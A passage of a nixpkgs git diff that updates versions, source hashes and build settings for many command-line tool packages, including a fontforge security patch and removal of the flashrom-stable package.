b/nixpkgs/pkgs/tools/misc/aichat/default.nix @@ -8,16 +8,16 @@ rustPlatform.buildRustPackage rec { pname = "aichat"; - version = "0.12.0"; + version = "0.13.0"; src = fetchFromGitHub { owner = "sigoden"; repo = "aichat"; rev = "v${version}"; - hash = "sha256-GWT3NYoEQ6fNLeTdBybJyQ0aqYbtaRzK1A3grUL+4jM="; + hash = "sha256-1m0Sf8qC5kGOfXkxQVri+kL3sZfOFKH3TcpNhuOFPVQ="; }; - cargoHash = "sha256-Aah6OcQW2AW+70azLEyS4xnB3AFedvA5MZP+u8RrB9s="; + cargoHash = "sha256-/oEyI6m5j3u89NeEwM4+z1exZfu0FMSf14scAiax3CE="; nativeBuildInputs = [ pkg-config diff --git a/nixpkgs/pkgs/tools/misc/archi/default.nix b/nixpkgs/pkgs/tools/misc/archi/default.nix index e5850f8871e7..23c5372e5eef 100644 --- a/nixpkgs/pkgs/tools/misc/archi/default.nix +++ b/nixpkgs/pkgs/tools/misc/archi/default.nix @@ -42,9 +42,7 @@ stdenv.mkDerivation rec { autoPatchelfHook ]; - unpackPhase = if stdenv.hostPlatform.isDarwin then '' - 7zz x $src - '' else null; + sourceRoot = if stdenv.isDarwin then "." else null; installPhase = if stdenv.hostPlatform.system == "x86_64-linux" then diff --git a/nixpkgs/pkgs/tools/misc/bash_unit/default.nix b/nixpkgs/pkgs/tools/misc/bash_unit/default.nix index ffedb168f1b4..19cebbb07e60 100644 --- a/nixpkgs/pkgs/tools/misc/bash_unit/default.nix +++ b/nixpkgs/pkgs/tools/misc/bash_unit/default.nix @@ -4,15 +4,39 @@ stdenv.mkDerivation rec { pname = "bash_unit"; - version = "2.1.0"; + version = "2.2.0"; src = fetchFromGitHub { owner = "pgrange"; repo = pname; rev = "v${version}"; - sha256 = "sha256-c1C+uBo5PSH07VjulCxkmvfj7UYm6emdDAaN00uvAcg="; + sha256 = "sha256-sYs7b6I1VhO2TLLhMFuaV9AtLoavcoKvCRYfVNGAg20="; }; + patchPhase = '' + runHook prePatch + + patchShebangs bash_unit + + for t in tests/test_*; do + chmod +x "$t" # make test file visible to `patchShebangs` + patchShebangs "$t" + chmod -x "$t" + done + + runHook postPatch + ''; + + doCheck = true; + + checkPhase = '' + runHook preCheck + + ./bash_unit ./tests/test_core.sh + + runHook postCheck + ''; + installPhase = '' mkdir -p $out/bin cp bash_unit $out/bin/ diff --git a/nixpkgs/pkgs/tools/misc/blahaj/default.nix b/nixpkgs/pkgs/tools/misc/blahaj/default.nix index c0e591515cdf..a37d37bf4184 100644 --- a/nixpkgs/pkgs/tools/misc/blahaj/default.nix +++ b/nixpkgs/pkgs/tools/misc/blahaj/default.nix @@ -1,6 +1,10 @@ { lib +, stdenv , crystal , fetchFromGitHub + # https://crystal-lang.org/2019/09/06/parallelism-in-crystal/ +, multithreading ? true +, static ? stdenv.hostPlatform.isStatic }: crystal.buildCrystalPackage rec { @@ -14,6 +18,8 @@ crystal.buildCrystalPackage rec { hash = "sha256-CmMF9jDKUo+c8dYc2UEHKdBDE4dgwExcRS5sSUsUJik="; }; + buildTargets = [ "${if static then "static" else "build"}${if multithreading then "_mt" else ""}" ]; + meta = with lib; { description = "Gay sharks at your local terminal - lolcat-like CLI tool"; homepage = "https://blahaj.queer.software"; diff --git a/nixpkgs/pkgs/tools/misc/broot/default.nix b/nixpkgs/pkgs/tools/misc/broot/default.nix index ee907902ada8..751860860436 100644 --- a/nixpkgs/pkgs/tools/misc/broot/default.nix +++ b/nixpkgs/pkgs/tools/misc/broot/default.nix @@ -18,16 +18,16 @@ rustPlatform.buildRustPackage rec { pname = "broot"; - version = "1.34.0"; + version = "1.35.0"; src = fetchFromGitHub { owner = "Canop"; repo = pname; rev = "v${version}"; - hash = "sha256-5CWcc55OunZwCTqODQnvPUnn5cJET83PfIyDyzmpOkA="; + hash = "sha256-L9a1fQZkCHSHseZtQYwqIt1CokPGBqLcqY0jccHYqGw="; }; - cargoHash = "sha256-kNZPAU8QSR9hDwalvsRqRL4gaKTyvUA2gZ/bBB6/YDU="; + cargoHash = "sha256-DRW1gv5lqdXWcRLD2yf7+u6J/xIUWmELmb/l729Sqo4="; nativeBuildInputs = [ installShellFiles diff --git a/nixpkgs/pkgs/tools/misc/chezmoi/default.nix b/nixpkgs/pkgs/tools/misc/chezmoi/default.nix index e1360c96ae49..24f94f6a7445 100644 --- a/nixpkgs/pkgs/tools/misc/chezmoi/default.nix +++ b/nixpkgs/pkgs/tools/misc/chezmoi/default.nix @@ -6,16 +6,16 @@ buildGoModule rec { pname = "chezmoi"; - version = "2.46.1"; + version = "2.47.1"; src = fetchFromGitHub { owner = "twpayne"; repo = "chezmoi"; rev = "v${version}"; - hash = "sha256-RMhYgmNN2SPBU33ZzR6ZK7ElVlT9ZM/8QOS7k/NOBSY="; + hash = "sha256-sCDRHbizWhxaGBKdBhLViOfv+mwJiVvw7cjXSuDnOAo="; }; - vendorHash = "sha256-C3aRKluMIZ6X7VHwC1xitG/gLJE8qcbbskxsgsXvzuA="; + vendorHash = "sha256-gTgzuNsNzw8RmYaeOTBxkOc0Pt+WGLWTA6/oAL/1RRg="; doCheck = false; diff --git a/nixpkgs/pkgs/tools/misc/code-minimap/default.nix b/nixpkgs/pkgs/tools/misc/code-minimap/default.nix index 33e6ee825b0b..34d8547ebd32 100644 --- a/nixpkgs/pkgs/tools/misc/code-minimap/default.nix +++ b/nixpkgs/pkgs/tools/misc/code-minimap/default.nix @@ -7,16 +7,16 @@ rustPlatform.buildRustPackage rec { pname = "code-minimap"; - version = "0.6.4"; + version = "0.6.7"; src = fetchFromGitHub { owner = "wfxr"; repo = pname; rev = "v${version}"; - sha256 = "sha256-XhewfU3l/n2wiF9pKm1OOKQ7REzz3WzcBiVgOiYnAYU="; + sha256 = "sha256-d9qcSSiRv1I7NYuLrra5ShIUXT2HVeHGD0WPb+dnQCc="; }; - cargoSha256 = "sha256-Z3bc0w8slI9lHbDbrIK65xurtmTK4Y4caF7kxxJBA3Q="; + cargoHash = "sha256-5/UgEzkJw9XDgtS1jKyWh5ijTp3L+UQLuE5CXcyIgTs="; buildInputs = lib.optional stdenv.isDarwin libiconv; diff --git a/nixpkgs/pkgs/tools/misc/coreutils/default.nix b/nixpkgs/pkgs/tools/misc/coreutils/default.nix index 24e25e584d4b..388dcd428c71 100644 --- a/nixpkgs/pkgs/tools/misc/coreutils/default.nix +++ b/nixpkgs/pkgs/tools/misc/coreutils/default.nix @@ -104,6 +104,8 @@ stdenv.mkDerivation rec { # TODO(@Ericson2314): Investigate whether Darwin could benefit too ++ optional (isCross && stdenv.hostPlatform.libc != "glibc") libiconv; + hardeningDisable = [ "trivialautovarinit" ]; + configureFlags = [ "--with-packager=https://nixos.org" ] ++ optional (singleBinary != false) ("--enable-single-binary" + optionalString (isString singleBinary) "=${singleBinary}") diff --git a/nixpkgs/pkgs/tools/misc/cowsay/default.nix b/nixpkgs/pkgs/tools/misc/cowsay/default.nix index 62ae9994fff8..874299905e07 100644 --- a/nixpkgs/pkgs/tools/misc/cowsay/default.nix +++ b/nixpkgs/pkgs/tools/misc/cowsay/default.nix @@ -1,6 +1,6 @@ -{ lib, stdenv, perl, fetchFromGitHub, fetchpatch, makeWrapper, nix-update-script, testers, cowsay }: +{ lib, stdenv, perl, fetchFromGitHub, fetchpatch, makeWrapper, nix-update-script, testers }: -stdenv.mkDerivation rec { +stdenv.mkDerivation (finalAttrs: { pname = "cowsay"; version = "3.7.0"; @@ -9,7 +9,7 @@ stdenv.mkDerivation rec { src = fetchFromGitHub { owner = "cowsay-org"; repo = "cowsay"; - rev = "v${version}"; + rev = "v${finalAttrs.version}"; hash = "sha256-t1grmCPQhRgwS64RjEwkK61F2qxxMBKuv0/DzBTnL3s="; }; @@ -37,7 +37,7 @@ stdenv.mkDerivation rec { passthru = { updateScript = nix-update-script { }; tests.version = testers.testVersion { - package = cowsay; + package = finalAttrs.finalPackage; command = "cowsay --version"; }; }; @@ -45,9 +45,9 @@ stdenv.mkDerivation rec { meta = with lib; { description = "A program which generates ASCII pictures of a cow with a message"; homepage = "https://cowsay.diamonds"; - changelog = "https://github.com/cowsay-org/cowsay/releases/tag/v${version}"; + changelog = "https://github.com/cowsay-org/cowsay/releases/tag/v${finalAttrs.version}"; license = licenses.gpl3Only; platforms = platforms.all; maintainers = with maintainers; [ rob anthonyroussel ]; }; -} +}) diff --git a/nixpkgs/pkgs/tools/misc/ddcutil/default.nix b/nixpkgs/pkgs/tools/misc/ddcutil/default.nix index c8e009569cd5..28a31a16d078 100644 --- a/nixpkgs/pkgs/tools/misc/ddcutil/default.nix +++ b/nixpkgs/pkgs/tools/misc/ddcutil/default.nix @@ -14,11 +14,11 @@ stdenv.mkDerivation rec { pname = "ddcutil"; - version = "2.1.3"; + version = "2.1.4"; src = fetchurl { url = "https://www.ddcutil.com/tarballs/ddcutil-${version}.tar.gz"; - hash = "sha256-l6C9cJ0MfffzULuH9DIoNzGKqp7o4cwpbDrbC93yc/g="; + hash = "sha256-4U/igqtgw2rwyuhEkV1pWYPIyNZEt2N6hlXJ9bDUyRw="; }; nativeBuildInputs = [ autoreconfHook pkg-config ]; diff --git a/nixpkgs/pkgs/tools/misc/diffoscope/default.nix b/nixpkgs/pkgs/tools/misc/diffoscope/default.nix index 625f86c1da47..5bac5602c79f 100644 --- a/nixpkgs/pkgs/tools/misc/diffoscope/default.nix +++ b/nixpkgs/pkgs/tools/misc/diffoscope/default.nix @@ -79,11 +79,11 @@ # Note: when upgrading this package, please run the list-missing-tools.sh script as described below! python3.pkgs.buildPythonApplication rec { pname = "diffoscope"; - version = "257"; + version = "259"; src = fetchurl { url = "https://diffoscope.org/archive/diffoscope-${version}.tar.bz2"; - hash = "sha256-Fejp4i0uzsK9+9JBVPsE1AdDwshtRlxpxPfJdqRQQH4="; + hash = "sha256-WYgFWM6HKFt3xVcRNytQPWOf3ZpH1cG7Cghhu/AES80="; }; outputs = [ diff --git a/nixpkgs/pkgs/tools/misc/direnv/default.nix b/nixpkgs/pkgs/tools/misc/direnv/default.nix index 9395cade650b..4bb9d9bacaff 100644 --- a/nixpkgs/pkgs/tools/misc/direnv/default.nix +++ b/nixpkgs/pkgs/tools/misc/direnv/default.nix @@ -2,16 +2,16 @@ buildGoModule rec { pname = "direnv"; - version = "2.33.0"; + version = "2.34.0"; src = fetchFromGitHub { owner = "direnv"; repo = "direnv"; rev = "v${version}"; - sha256 = "sha256-/xOqJ3dr+3S502rXHVBcHhgBCctoMYnWpfLqgrxIoN8="; + sha256 = "sha256-EvzqLS/FiWrbIXDkp0L/T8QNKnRGuQkbMWajI3X3BDw="; }; - vendorHash = "sha256-QGPcNgA/iiGt0CdFs2kR3zLL5/SWulSyyf/pW212JpU="; + vendorHash = "sha256-FfKvLPv+jUT5s2qQ7QlzBMArI+acj7nhpE8FGMPpp5E="; # we have no bash at the moment for windows BASH_PATH = diff --git a/nixpkgs/pkgs/tools/misc/esphome/default.nix b/nixpkgs/pkgs/tools/misc/esphome/default.nix index 268cb68b4dc2..ec8b1beeb15c 100644 --- a/nixpkgs/pkgs/tools/misc/esphome/default.nix +++ b/nixpkgs/pkgs/tools/misc/esphome/default.nix @@ -19,14 +19,14 @@ let in python.pkgs.buildPythonApplication rec { pname = "esphome"; - version = "2024.2.1"; + version = "2024.2.2"; pyproject = true; src = fetchFromGitHub { owner = pname; repo = pname; rev = "refs/tags/${version}"; - hash = "sha256-MAyK8Wx/d7lJKEueeL7GhxxKu8EygwjylPGXB2Y3bWM="; + hash = "sha256-SIp4hrllPgWNnrflUStSIcUB00eGU5pHoYveBPg7CVw="; }; nativeBuildInputs = with python.pkgs; [ diff --git a/nixpkgs/pkgs/tools/misc/fastfetch/default.nix b/nixpkgs/pkgs/tools/misc/fastfetch/default.nix index b3d5b6f1fcbe..2e727896905d 100644 --- a/nixpkgs/pkgs/tools/misc/fastfetch/default.nix +++ b/nixpkgs/pkgs/tools/misc/fastfetch/default.nix @@ -43,13 +43,13 @@ stdenv.mkDerivation (finalAttrs: { pname = "fastfetch"; - version = "2.8.6"; + version = "2.8.7"; src = fetchFromGitHub { owner = "fastfetch-cli"; repo = "fastfetch"; rev = finalAttrs.version; - hash = "sha256-n15p26zZaote8cB0NfBnb69hb27l4hHBZG+3D1yrrCA="; + hash = "sha256-lJRTw8Z//x6tMpwfwSodTz7aVbnJPt3rac7AudqF+DA="; }; outputs = [ "out" "man" ]; diff --git a/nixpkgs/pkgs/tools/misc/flashrom-stable/default.nix b/nixpkgs/pkgs/tools/misc/flashrom-stable/default.nix deleted file mode 100644 index 81beb2346e34..000000000000 --- a/nixpkgs/pkgs/tools/misc/flashrom-stable/default.nix +++ /dev/null @@ -1,48 +0,0 @@ -{ fetchgit -, installShellFiles -, lib -, libftdi1 -, libgpiod_1 -, libjaylink -, libusb1 -, pciutils -, pkg-config -, stdenv -}: - -stdenv.mkDerivation rec { - pname = "flashrom-stable"; - version = "1.1"; - - src = fetchgit { - url = "https://review.coreboot.org/flashrom-stable"; - rev = "272aae888ce5abf5e999d750ee4577407db32246"; - hash = "sha256-DR4PAING69+TMsyycGxt1cu0ba1tTlG36+H/pJ0oP4E="; - }; - - nativeBuildInputs = [ - installShellFiles - pkg-config - ]; - - buildInputs = [ - libftdi1 - libjaylink - libusb1 - ] ++ lib.optionals (!stdenv.isDarwin) [ - libgpiod_1 - pciutils - ]; - - makeFlags = [ "PREFIX=$(out)" "libinstall" ] ++ lib.optionals stdenv.isDarwin [ "CONFIG_ENABLE_LIBPCI_PROGRAMMERS=no" ] - ++ lib.optionals (stdenv.isDarwin && stdenv.isx86_64) [ "CONFIG_INTERNAL_X86=no" "CONFIG_INTERNAL_DMI=no" "CONFIG_RAYER_SPI=0" ]; - - meta = with lib; { - homepage = "https://www.flashrom.org"; - description = "Utility for reading, writing, erasing and verifying flash ROM chips"; - license = with licenses; [ gpl2 gpl2Plus ]; - maintainers = with maintainers; [ felixsinger ]; - platforms = platforms.all; - mainProgram = "flashrom"; - }; -} diff --git a/nixpkgs/pkgs/tools/misc/fontforge/default.nix b/nixpkgs/pkgs/tools/misc/fontforge/default.nix index c6e939d5b505..d7a083baaf77 100644 --- a/nixpkgs/pkgs/tools/misc/fontforge/default.nix +++ b/nixpkgs/pkgs/tools/misc/fontforge/default.nix @@ -1,4 +1,4 @@ -{ stdenv, fetchFromGitHub, lib +{ stdenv, fetchFromGitHub, lib, fetchpatch , cmake, uthash, pkg-config , python, freetype, zlib, glib, giflib, libpng, libjpeg, libtiff, libxml2, cairo, pango , readline, woff2, zeromq @@ -23,6 +23,14 @@ stdenv.mkDerivation rec { sha256 = "sha256-/RYhvL+Z4n4hJ8dmm+jbA1Ful23ni2DbCRZC5A3+pP0="; }; + patches = [ + (fetchpatch { + name = "CVE-2024-25081.CVE-2024-25082.patch"; + url = "https://github.com/fontforge/fontforge/commit/216eb14b558df344b206bf82e2bdaf03a1f2f429.patch"; + hash = "sha256-aRnir09FSQMT50keoB7z6AyhWAVBxjSQsTRvBzeBuHU="; + }) + ]; + # use $SOURCE_DATE_EPOCH instead of non-deterministic timestamps postPatch = '' find . -type f -name '*.c' -exec sed -r -i 's#\btime\(&(.+)\)#if (getenv("SOURCE_DATE_EPOCH")) \1=atol(getenv("SOURCE_DATE_EPOCH")); else &#g' {} \; diff --git a/nixpkgs/pkgs/tools/misc/google-cloud-sql-proxy/default.nix b/nixpkgs/pkgs/tools/misc/google-cloud-sql-proxy/default.nix index 01a1db8fdb77..1043b4982018 100644 --- a/nixpkgs/pkgs/tools/misc/google-cloud-sql-proxy/default.nix +++ b/nixpkgs/pkgs/tools/misc/google-cloud-sql-proxy/default.nix @@ -1,22 +1,22 @@ { lib -, buildGoModule +, buildGo122Module , fetchFromGitHub }: -buildGoModule rec { +buildGo122Module rec { pname = "google-cloud-sql-proxy"; - version = "2.8.2"; + version = "2.9.0"; src = fetchFromGitHub { owner = "GoogleCloudPlatform"; repo = "cloud-sql-proxy"; rev = "v${version}"; - hash = "sha256-ZCUBr7K7mGpV/oCS4X6cteUGRjMjqAAA3saPfZ6Vowk="; + hash = "sha256-V1Q6DFWSIIff2FuOyE5XwtJN8RObGlhpW/nMWFmNoxI="; }; subPackages = [ "." ]; - vendorHash = "sha256-ScGfP5HdXkMlU2PQmlQxuRC7a+iadf3dOKpFFi2EaAY="; + vendorHash = "sha256-sAVMmDeHXEgQXb/Xi4nXYztXjuykE0TFebkeubMTZ3k="; preCheck = '' buildFlagsArray+="-short" diff --git a/nixpkgs/pkgs/tools/misc/gotify-desktop/default.nix b/nixpkgs/pkgs/tools/misc/gotify-desktop/default.nix index 409179461ef0..90b1bec1f5a2 100644 --- a/nixpkgs/pkgs/tools/misc/gotify-desktop/default.nix +++ b/nixpkgs/pkgs/tools/misc/gotify-desktop/default.nix @@ -2,16 +2,16 @@ rustPlatform.buildRustPackage rec { pname = "gotify-desktop"; - version = "1.3.4"; + version = "1.3.6"; src = fetchFromGitHub { owner = "desbma"; repo = pname; rev = version; - sha256 = "sha256-TuqzwmKB48xcdzrAr7MvDA9JChobraESQZPKoy24mPE="; + sha256 = "sha256-epolESdf9+2lI+AJ8hMpVPakS1f8fYam+JniiPLIHCs="; }; - cargoHash = "sha256-vg3al+eH9Q4D/T56jwWBlBT4IhuggiEVBl8WoZmUS2Y="; + cargoHash = "sha256-VJ/k6sfBCuokXGpfZ9zGQ7ucbHLweUSgBhlChwko69g="; nativeBuildInputs = [ pkg-config ]; diff --git a/nixpkgs/pkgs/tools/misc/gparted/default.nix b/nixpkgs/pkgs/tools/misc/gparted/default.nix index 1c16795d40bd..7c068656385d 100644 --- a/nixpkgs/pkgs/tools/misc/gparted/default.nix +++ b/nixpkgs/pkgs/tools/misc/gparted/default.nix @@ -6,11 +6,11 @@ stdenv.mkDerivation rec { pname = "gparted"; - version = "1.5.0"; + version = "1.6.0"; src = fetchurl { url = "mirror://sourceforge/gparted/${pname}-${version}.tar.gz"; - sha256 = "sha256-PJXqJqlECD/x2bF2ObHirZdY3yJdx1H/QHsqaqCSqN4="; + sha256 = "sha256-m59Rs85JTdy1mlXhrmZ5wJQ2YE4zHb9aU21g3tbG6ls="; }; # Tries to run `pkexec --version` to get version. diff --git a/nixpkgs/pkgs/tools/misc/grex/default.nix b/nixpkgs/pkgs/tools/misc/grex/default.nix index 2a6ca6031e3b..d68deba131ff 100644 --- a/nixpkgs/pkgs/tools/misc/grex/default.nix +++ b/nixpkgs/pkgs/tools/misc/grex/default.nix @@ -6,16 +6,16 @@ rustPlatform.buildRustPackage rec { pname = "grex"; - version = "1.4.4"; + version = "1.4.5"; src = fetchFromGitHub { owner = "pemistahl"; repo = "grex"; rev = "v${version}"; - hash = "sha256-ef1eUxeCznIgXLoywwJmnLkTGdW1AmGwCin9DLU9kAs="; + hash = "sha256-Ut2H2H66XN1+wHpYivnuhil21lbd7bwIcIcMyIimdis="; }; - cargoHash = "sha256-XLH+fS3fwRcWmVOzTjUacV010N37Oofs9Tbixdka1qY="; + cargoHash = "sha256-ZRE1vKgi0/UtSe2bdN0BLdtDfAauTfwcqOcl3y63fAA="; buildInputs = lib.optionals stdenv.isDarwin [ Security ]; diff --git a/nixpkgs/pkgs/tools/misc/grizzly/default.nix b/nixpkgs/pkgs/tools/misc/grizzly/default.nix index d16356d6d5ce..e523571e79f6 100644 --- a/nixpkgs/pkgs/tools/misc/grizzly/default.nix +++ b/nixpkgs/pkgs/tools/misc/grizzly/default.nix @@ -5,16 +5,16 @@ buildGoModule rec { pname = "grizzly"; - version = "0.3.1"; + version = "0.4.0"; src = fetchFromGitHub { owner = "grafana"; repo = pname; rev = "v${version}"; - hash = "sha256-d/DUazWBT96+dnwVXo667RHALUM2FHxXoI54fFU2HZw="; + hash = "sha256-c+QT3NwfnkVzAb1mqNIuNhSJJOnzME4e3ASawdNBFmg="; }; - vendorHash = "sha256-8myfB2LKDPUCFV9GBSXrBo9E+WrCOCm0ZHKTQ1dEb9U="; + vendorHash = "sha256-EVP2w0mvzzBcrhohM2VmetK8UQu7fauelSa+C+q3n+g="; subPackages = [ "cmd/grr" ]; diff --git a/nixpkgs/pkgs/tools/misc/hwatch/default.nix b/nixpkgs/pkgs/tools/misc/hwatch/default.nix index 2eb8be5d2f93..96621948192a 100644 --- a/nixpkgs/pkgs/tools/misc/hwatch/default.nix +++ b/nixpkgs/pkgs/tools/misc/hwatch/default.nix @@ -2,16 +2,16 @@ rustPlatform.buildRustPackage rec { pname = "hwatch"; - version = "0.3.10"; + version = "0.3.11"; src = fetchFromGitHub { owner = "blacknon"; repo = pname; rev = "refs/tags/${version}"; - sha256 = "sha256-RvsL6OajXwEY77W3Wj6GMijYwn7XDnKiJyDXbNG01ag="; + sha256 = "sha256-S6hnmNnwdWd6iFM01K52oiKXiqu/0v5yvKKoeQMEqy0="; }; - cargoHash = "sha256-v7MvXnc9Xa+6QAyi2N9/WtqnvXf9M1SlR86kNjfu46Y="; + cargoHash = "sha256-P4XkbV6QlokedKumX3UbCfEaAqH9VF9IKVyZIumZ6u0="; nativeBuildInputs = [ installShellFiles ]; diff --git a/nixpkgs/pkgs/tools/misc/ipxe/default.nix b/nixpkgs/pkgs/tools/misc/ipxe/default.nix index 2c1b16d29925..293c32b3e6ff 100644 --- a/nixpkgs/pkgs/tools/misc/ipxe/default.nix +++ b/nixpkgs/pkgs/tools/misc/ipxe/default.nix @@ -33,7 +33,7 @@ in stdenv.mkDerivation rec { pname = "ipxe"; - version = "unstable-2024-01-19"; + version = "unstable-2024-02-08"; nativeBuildInputs = [ gnu-efi mtools openssl perl xorriso xz ] ++ lib.optional stdenv.hostPlatform.isx86 syslinux; depsBuildBuild = [ buildPackages.stdenv.cc ]; @@ -43,8 +43,8 @@ stdenv.mkDerivation rec { src = fetchFromGitHub { owner = "ipxe"; repo = "ipxe"; - rev = "de8a0821c7bc737e724fa3dfb6d89dc36f591d7a"; - hash = "sha256-bVFr1fTulww6swWPKupWRGfQOAiXp2oP1/VC5GpzLnY="; + rev = "a846c4ccfc7db212dff792e081991df17268b4d5"; + hash = "sha256-4BvAwZ09EZJXBkdkZHLw0qjOqasNaN6RF4wmTfPVTWc="; }; postPatch = lib.optionalString stdenv.hostPlatform.isAarch64 '' diff --git a/nixpkgs/pkgs/tools/misc/mise/default.nix b/nixpkgs/pkgs/tools/misc/mise/default.nix index 959be1430da5..db9ec4cc40ba 100644 --- a/nixpkgs/pkgs/tools/misc/mise/default.nix +++ b/nixpkgs/pkgs/tools/misc/mise/default.nix @@ -17,16 +17,16 @@ rustPlatform.buildRustPackage rec { pname = "mise"; - version = "2024.2.19"; + version = "2024.3.1"; src = fetchFromGitHub { owner = "jdx"; repo = "mise"; rev = "v${version}"; - hash = "sha256-SDGXSjCDdtjKn474s2SQm9YDHofMOmHuodLS2iu10Co="; + hash = "sha256-Pcchyc7LuHOyDEfZj5QSb7nVhMjO9iIV2uQEJocfLic="; }; - cargoHash = "sha256-4MEBIZOXjcLEyW0TB+AXWsEc24VZz8bGCkduHqbazuo="; + cargoHash = "sha256-aKzl6yrsEi0DF0tsXB1eqTAar33FlJfRyYUKAi76o+c="; nativeBuildInputs = [ installShellFiles pkg-config ]; buildInputs = [ openssl ] ++ lib.optionals stdenv.isDarwin [ Security SystemConfiguration ]; diff --git a/nixpkgs/pkgs/tools/misc/mmv/default.nix b/nixpkgs/pkgs/tools/misc/mmv/default.nix index c8ce33207787..f2d2bd81ae11 100644 --- a/nixpkgs/pkgs/tools/misc/mmv/default.nix +++ b/nixpkgs/pkgs/tools/misc/mmv/default.nix @@ -3,13 +3,13 @@ stdenv.mkDerivation rec { pname = "mmv"; - version = "2.5.1"; + version = "2.6"; src = fetchFromGitHub { owner = "rrthomas"; repo = "mmv"; rev = "v${version}"; - sha256 = "sha256-01MJjYVPfDaRkzitqKXTJZHbkkZTEaFoyYZEEMizHp0="; + sha256 = "sha256-hYSTENSmkJP5rAemDyTzbzMKFrWYcMpsJDRWq43etTM="; fetchSubmodules = true; }; @@ -19,11 +19,13 @@ stdenv.mkDerivation rec { nativeBuildInputs = [ gengetopt m4 git gnupg perl autoconf automake help2man pkg-config ]; buildInputs = [ boehmgc ]; + enableParallelBuilding = true; env = lib.optionalAttrs stdenv.cc.isClang { NIX_CFLAGS_COMPILE = toString [ "-Wno-error=implicit-function-declaration" "-Wno-error=implicit-int" + "-Wno-error=int-conversion" ]; }; diff --git a/nixpkgs/pkgs/tools/misc/mongodb-compass/default.nix b/nixpkgs/pkgs/tools/misc/mongodb-compass/default.nix index 7e3185b489d9..0bd72f25689d 100644 --- a/nixpkgs/pkgs/tools/misc/mongodb-compass/default.nix +++ b/nixpkgs/pkgs/tools/misc/mongodb-compass/default.nix @@ -33,7 +33,7 @@ xorg, }: let - version = "1.42.1"; + version = "1.42.2"; rpath = lib.makeLibraryPath [ alsa-lib @@ -82,7 +82,7 @@ let if stdenv.hostPlatform.system == "x86_64-linux" then fetchurl { url = "https://downloads.mongodb.com/compass/mongodb-compass_${version}_amd64.deb"; - sha256 = "sha256-URxzoMb03p8UTLbn8tmtaSQQV27hYRSwlTiacF/48F8="; + sha256 = "sha256-NvHFsB+wXNq2XmHb2tYI1P9vUXwVcwbhR645LjHM0/Y="; } else throw "MongoDB compass is not supported on ${stdenv.hostPlatform.system}"; diff --git a/nixpkgs/pkgs/tools/misc/moreutils/default.nix b/nixpkgs/pkgs/tools/misc/moreutils/default.nix index 6975d4878c52..7d7dd80d7e7a 100644 --- a/nixpkgs/pkgs/tools/misc/moreutils/default.nix +++ b/nixpkgs/pkgs/tools/misc/moreutils/default.nix @@ -14,12 +14,12 @@ stdenv.mkDerivation rec { pname = "moreutils"; - version = "0.68"; + version = "0.69"; src = fetchgit { url = "git://git.joeyh.name/moreutils"; rev = "refs/tags/${version}"; - hash = "sha256-kOY12oejH0xKaaPrKem+l0PACqyPqD4P1jEjOYfNntM="; + hash = "sha256-hVvRAIXlG8+pAD2v/Ma9Z6EUL/1xIRz7Gx1fOxoQyi0="; }; preBuild = '' diff --git a/nixpkgs/pkgs/tools/misc/nbqa/default.nix b/nixpkgs/pkgs/tools/misc/nbqa/default.nix index 0c55c78f7b49..10115affcca2 100644 --- a/nixpkgs/pkgs/tools/misc/nbqa/default.nix +++ b/nixpkgs/pkgs/tools/misc/nbqa/default.nix @@ -7,14 +7,14 @@ }: python3.pkgs.buildPythonApplication rec { pname = "nbqa"; - version = "1.7.1"; + version = "1.8.3"; pyproject = true; src = fetchFromGitHub { owner = "nbQA-dev"; repo = "nbQA"; rev = "refs/tags/${version}"; - hash = "sha256-a/FuhJyf8BmZekUibzEiGgkHL51A+75R4a6S+h5i28s="; + hash = "sha256-RucDwXXEOTInhV/hk6gYXUmxUu660/pSTrBtHLrLkQ8="; }; nativeBuildInputs = with python3.pkgs; [ @@ -81,6 +81,7 @@ python3.pkgs.buildPythonApplication rec { "test_running_in_different_dir_works" "test_unable_to_reconstruct_message_pythonpath" "test_with_subcommand" + "test_pylint_works" ]; disabledTestPaths = [ diff --git a/nixpkgs/pkgs/tools/misc/ollama/default.nix b/nixpkgs/pkgs/tools/misc/ollama/default.nix index 7a0fea0c116b..36546b5869a6 100644 --- a/nixpkgs/pkgs/tools/misc/ollama/default.nix +++ b/nixpkgs/pkgs/tools/misc/ollama/default.nix @@ -24,12 +24,12 @@ let pname = "ollama"; - version = "0.1.27"; + version = "0.1.28"; src = fetchFromGitHub { owner = "jmorganca"; repo = "ollama"; rev = "v${version}"; - hash = "sha256-+ayby+yVknFHLTyLjMAPMnOTMSzTKqzi9caN/TppcEg="; + hash = "sha256-8f7veZitorNiqGBPJuf/Y36TcFK8Q75Vw4w6CeTk8qs="; fetchSubmodules = true; }; @@ -98,7 +98,7 @@ goBuild ((lib.optionalAttrs enableRocm { CUDAToolkit_ROOT = cudaToolkit; }) // { inherit pname version src; - vendorHash = "sha256-zTrBighPBqZ9hhkEV3UawJZUYyPRay7+P6wkhDtpY7M="; + vendorHash = "sha256-DPIhDqE/yXpSQqrx07osMBMafK61yU2dl4cZhxSTvm8="; nativeBuildInputs = [ cmake diff --git a/nixpkgs/pkgs/tools/misc/opentelemetry-collector/default.nix b/nixpkgs/pkgs/tools/misc/opentelemetry-collector/default.nix index 3559ee5beae5..45f89ffe079f 100644 --- a/nixpkgs/pkgs/tools/misc/opentelemetry-collector/default.nix +++ b/nixpkgs/pkgs/tools/misc/opentelemetry-collector/default.nix @@ -8,17 +8,17 @@ buildGoModule rec { pname = "opentelemetry-collector"; - version = "0.93.0"; + version = "0.95.0"; src = fetchFromGitHub { owner = "open-telemetry"; repo = "opentelemetry-collector"; rev = "v${version}"; - hash = "sha256-caDBVB1ChAAU5fGip8HbC4hXcTomsRoLIobtMSvX/HY="; + hash = "sha256-uKGkglDCOYUcCWzsvZcYpzhDCkJ+2LnrD2/HP2zA+Ms="; }; # there is a nested go.mod sourceRoot = "${src.name}/cmd/otelcorecol"; - vendorHash = "sha256-Mx+3Ml5BQ3Z+H9mX5xvfdG7fmHm+Cz3ws+cW/6iZddY="; + vendorHash = "sha256-iAY19S+s+g13kobRO8sGdu27klH4DOSFfLlGbKPelzs="; nativeBuildInputs = [ installShellFiles ]; diff --git a/nixpkgs/pkgs/tools/misc/panoply/default.nix b/nixpkgs/pkgs/tools/misc/panoply/default.nix index d0c86c1275f5..2238cafe6983 100644 --- a/nixpkgs/pkgs/tools/misc/panoply/default.nix +++ b/nixpkgs/pkgs/tools/misc/panoply/default.nix @@ -2,11 +2,11 @@ stdenvNoCC.mkDerivation rec { pname = "panoply"; - version = "5.3.2"; + version = "5.3.3"; src = fetchurl { url = "https://www.giss.nasa.gov/tools/panoply/download/PanoplyJ-${version}.tgz"; - sha256 